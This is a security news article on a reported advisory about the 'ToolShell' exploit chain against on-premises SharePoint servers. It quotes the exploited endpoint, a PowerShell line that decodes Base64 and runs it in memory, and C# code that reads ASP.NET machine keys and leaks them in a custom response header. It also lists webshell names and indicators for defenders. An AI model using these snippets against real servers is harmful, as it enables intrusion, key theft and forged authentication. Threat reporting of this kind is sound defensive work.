CISA Warns of ‘ToolShell’ Exploits Chain Attacks SharePoint Servers

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released an urgent analysis in early July 2025, detailing a sophisticated exploit chain targeting on-premises Microsoft SharePoint servers.

Dubbed “ToolShell,” the campaign leverages two fresh vulnerabilities—CVE-2025-49706, a network spoofing flaw, and CVE-2025-49704, a remote code execution weakness—to gain unauthorized access and install stealthy webshells.

Initial compromise begins with a crafted request to SharePoint’s editing interface, invoking /_layouts/15/ToolPane.aspx?DisplayMode=Edit, which bypasses authentication checks and installs a malicious ASPX payload.

CISA analysts noted that once the attacker gains shell access, they chain a DLL-based machine key extractor—encoded as Base64—to harvest cryptographic secrets from the ASP.NET configuration.

The extracted keys are exfiltrated by injecting a custom HTTP header named X-TXT-NET into every response, facilitating remote decryption of protected ViewState and cookie values.

Detection signatures incorporate the unique header and associated DLL hashes, enabling rapid identification of trailing infections.

According to CISA researchers, the final stage deploys a multi-function webshell (info3.aspx) that supports interactive command execution, file uploads, and credential harvesting through a challenge-response login form.

Attackers submit PowerShell commands via Base64-encoded strings:-

$encoded = "JABiAGEAcwBlADYANABTAHQ..."
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded)) | iex

This snippet decodes the payload and executes it in memory, leaving minimal forensic footprints. The result is a persistent foothold that evades simple AV detection by avoiding disk writes.

ToolShell’s infection mechanism hinges on abusing SharePoint’s customization features.

The attacker submits a POST request to spinstall0.aspx, causing the server to write info3.aspx into the TEMPLATELAYOUTS directory. Once deployed, info3.aspx decodes another Base64 DLL (bjcloiyq.dll) to retrieve machine key parameters:-

var section = (MachineKeySection)WebConfigurationManager.GetSection("system. Web/machineKey");
var headerValue = $"{section.ValidationKey}|{section.DecryptionKey}";
Response.Headers.Add("X-TXT-NET", headerValue);

This code, extracted via reflection, exfiltrates secrets that attackers later leverage to forge valid SharePoint cookies and bypass authentication entirely.

Persistence is ensured by chaining additional ASPX shells (spinstallb.aspx and spinstallp.aspx) that implement XOR-based payload decryption and re-encoding for command and control.

Continuous monitoring of the disclosed IOC list—including ASPX filenames, DLL SHA-256 hashes, and the X-TXT-NET header—is crucial for defenders to detect and disrupt ToolShell’s stealthy operations.

Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup that can Improve incident response -> Get 14-day Free Trial